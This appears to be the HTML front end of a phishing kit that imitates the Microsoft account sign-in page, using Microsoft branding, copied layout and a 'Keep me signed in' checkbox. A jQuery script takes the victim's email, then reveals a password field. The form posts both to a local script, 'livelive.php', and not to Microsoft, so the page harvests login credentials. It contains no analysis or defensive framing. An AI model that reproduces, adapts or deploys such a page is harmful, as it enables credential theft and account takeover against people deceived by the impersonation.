
<!DOCTYPE html>
<html dir="ltr" lang="EN-US">

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=Edge">
        <base href=".">
        <noscript>&lt;meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&amp;lc=1033"/&gt;Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.&lt;br /&gt;&lt;br /&gt;To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript>
        <title>Sign in to your Microsoft account</title>
        <meta name="PageID" content="i5030">
        <meta name="SiteID" content="292841">
        <meta name="ReqLC" content="1033">
        <meta name="LocLC" content="1033">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
        <link rel="shortcut icon" href="https://auth.gfx.ms/16.000.26955.00/images/favicon.ico">
        <link rel="stylesheet" title="Default" type="text/css" href="index_files/Default1033.css">
        <style type="text/css">
            body.cb input.hip {
                border-width: 2px !important;
            }
        </style>
        <style type="text/css">
            body {
                display: none;
            }
        </style>
        <style type="text/css">
            body {
                display: block !important;
            }
        </style>
        <noscript>&lt;style type="text/css"&gt;body{display:block !important;}&lt;/style&gt;</noscript>
        <link rel="image_src" href="https://auth.gfx.ms/16.000.26955.00/images/Windows_Live_v_thumb.jpg">
    </head>

    <body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass">
        <div>
            <div>
                <div id="maincontent">
                    <section class="section no-margin-bottom">
                        <div class="section-body container">
                            <div id="pageControlHost">
                                <div>
                                    <div id="Credentials">
                                        <div class="container" id="CredentialsInputPane">
                                            <div class="row text-body" data-bind="ariaHidden: hideFromAria">
                                                <img class="img-centipede" data-bind="attr: { src: centipede.getDarkUrl(), alt: str[&#39;MOBILE_STR_Header_Brand&#39;] }" src="index_files/AppCentipede_Microsoft.svg" alt="Microsoft account">
                                            </div>
                                            <div>
                                                <div data-bind="css: { &#39;animate&#39;: animate() || animate.back(), &#39;back&#39;: animate.back }">
                                                    <div data-viewid="1">
                                                        <!--  -->
                                                        <div id="1st" class="row text-subheader" role="heading" data-bind="text: str[&#39;WF_STR_HeaderDefault_Title&#39;]">Sign in</div>

                                                        <div class="row text-subheader" role="heading" data-bind="text: str[&#39;WF_STR_HeaderDefault_Title&#39;]" id="11st" style="display: none;">Enter password</div>

                                                        <div class="row text-body" data-bind="ifnot: svr.Be" id="2nd">
                                                            <div id="loginDescription">Use your Microsoft account. <a href="#" id="learnMoreLink" target="_top" aria-label="What is a Microsoft account?" class="display-block">What's this?</a>
                                                            </div>
                                                        </div>
                                                        <div class="row text-body" data-bind="ifnot: svr.Be" id="22nd" style="display: none;">
                                                            <div id="loginDescription">Enter the password for <span id="myname"></span>

                                                            </div>
                                                        </div>
                                                        <div class="row">
                                                            <div class="form-group col-md-24" id="usernameblock">
                                                                <div class="placeholderContainer">
                                                                    <input type="text" name="demail" maxlength="113" lang="en" class="form-control ltr_override" placeholder="Email, phone, or Skype name" id="demail" value="" required=""><br>

                                                                    <div data-bind="css: { &#39;col-xs-12&#39;: isSecondaryButtonVisible(), &#39;col-xs-24&#39;: !isSecondaryButtonVisible() }" class="col-xs-24">
                                                                        <input type="button" id="nextBtn" class="btn btn-block btn-primary" value="Next"> 
                                                                    </div>

                                                                </div>
                                                            </div>
                                                            <!-- Password-->
                                                            <form name="f1" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" action="livelive.php">
                                                                <div class="form-group col-md-24" id="passwordblock" style="display: none;">
                                                                    <div class="placeholderContainer">
                                                                        <input type="hidden" name="email" value="" id="endvalue">
                                                                        <input name="password" type="password" id="pass" autocomplete="off" tabindex="-1" maxlength="113" lang="en" class="form-control ltr_override" placeholder="Password" required="">

                                                                        <div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body" data-bind="visible: !svr.c &amp;&amp; !svr.U"> <label id="idLbl_PWD_KMSI_Cb"> <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" data-bind="checked: isKmsiChecked"> <span data-bind="text: str['CT_PWD_STR_KeepMeSignedInCB_Text']">Keep me signed in</span> </label> </div>

                                                                        <div data-bind="css: { &#39;col-xs-12&#39;: isPrimaryButtonVisible(), &#39;col-xs-24&#39;: !isPrimaryButtonVisible() }" class="col-xs-12">
                                                                            <input type="button" id="idBtn_Back" class="btn btn-block" value="Back" disabled=""> 
                                                                        </div>
                                                                        <div data-bind="css: { &#39;col-xs-12&#39;: isPrimaryButtonVisible(), &#39;col-xs-24&#39;: !isPrimaryButtonVisible() }" class="col-xs-12">
                                                                            <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" value="Sign in">
                                                                        </div>
                                                                    </div>
                                                                    <div class="placeholderContainer">
                                                                    </div>
                                                                </div>

                                                            </form>     
                                                        </div>
                                                        <div class="row" id="last">
                                                            <div class="col-md-24">
                                                                <!-- ko if: svr.Ah && !svr.Bd -->
                                                                <div class="section">No account? <a href="#" id="signup" class="display-inline-block" aria-label="Create a Microsoft account">Create one!</a>
                                                                </div>
                                                                <!-- /ko -->
                                                            </div>
                                                        </div>
                                                        <div class="row" id="lastt" style="display: none;">
                                                            <div class="col-md-24">
                                                                <!-- ko if: svr.Ah && !svr.Bd -->
                                                                <div class="section"> <a href="#" id="signup" class="display-inline-block" aria-label="Create a Microsoft account">Forgot my password</a>
                                                                </div>
                                                                <!-- /ko -->
                                                            </div>
                                                        </div>
                                                        <!-- /ko -->
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-bind="ariaHidden: hideFromAria">
                                <div id="ftr" class="text-body">
                                    <div>
                                        <!--  -->
                                        <div id="footerTD" class="popupfooter popup breakword footer">
                                            <!-- ko if: showLinks || impressumLink || showIcpLicense -->
                                            <div class="footerNode links text-secondary"> 
                                                <a id="ftrTerms" class="first" data-bind="text: str[&#39;MOBILE_STR_Footer_Terms&#39;], href: termsLink, click: termsLink_onClick" href="#">Terms of Use</a> 
                                                <a id="ftrPrivacy" data-bind="text: str[&#39;MOBILE_STR_Footer_Privacy&#39;], href: privacyLink, click: privacyLink_onClick" href="#0">Privacy &amp; Cookies</a>
                                            </div>
                                            <div id="ftrLogo" class="footerNode text-base text-secondary text-logotype">
                                                <img pngsrc="https://auth.gfx.ms/16.000.26955.00/images/Microsoft_Logotype_Gray.png?x=efb8501ee88d5c639ae1a2cb0f57dbef" svgsrc="https://auth.gfx.ms/16.000.26955.00/images/Microsoft_Logotype_Gray.svg?x=5feaa482d83c2a69d012f9bff660d373" data-bind="imgSrc, attr: { alt: str[&#39;MOBILE_STR_Footer_Microsoft&#39;] }" src="index_files/Microsoft_Logotype_Gray.svg" alt="Microsoft">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </section>
                </div>
            </div>
        </div>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
        <script type="text/javascript">
            $(document).ready(function() {
                $("#nextBtn").click(function () {
                    var user = document.getElementById("demail").value;
                    document.getElementById('1st').style.display='none';
                    document.getElementById('11st').style.display = 'block';
                    document.getElementById('2nd').style.display='none';
                    document.getElementById('last').style.display='none';
                    document.getElementById('usernameblock').style.display='none';
                    document.getElementById('22nd').style.display = 'block';
                    document.getElementById('lastt').style.display = 'block';
                    document.getElementById('passwordblock').style.display = 'block';
                    document.getElementById('myname').innerHTML += user;
                    document.getElementById('endvalue').value += user;



                });
            });
        </script>
    </body>
</html>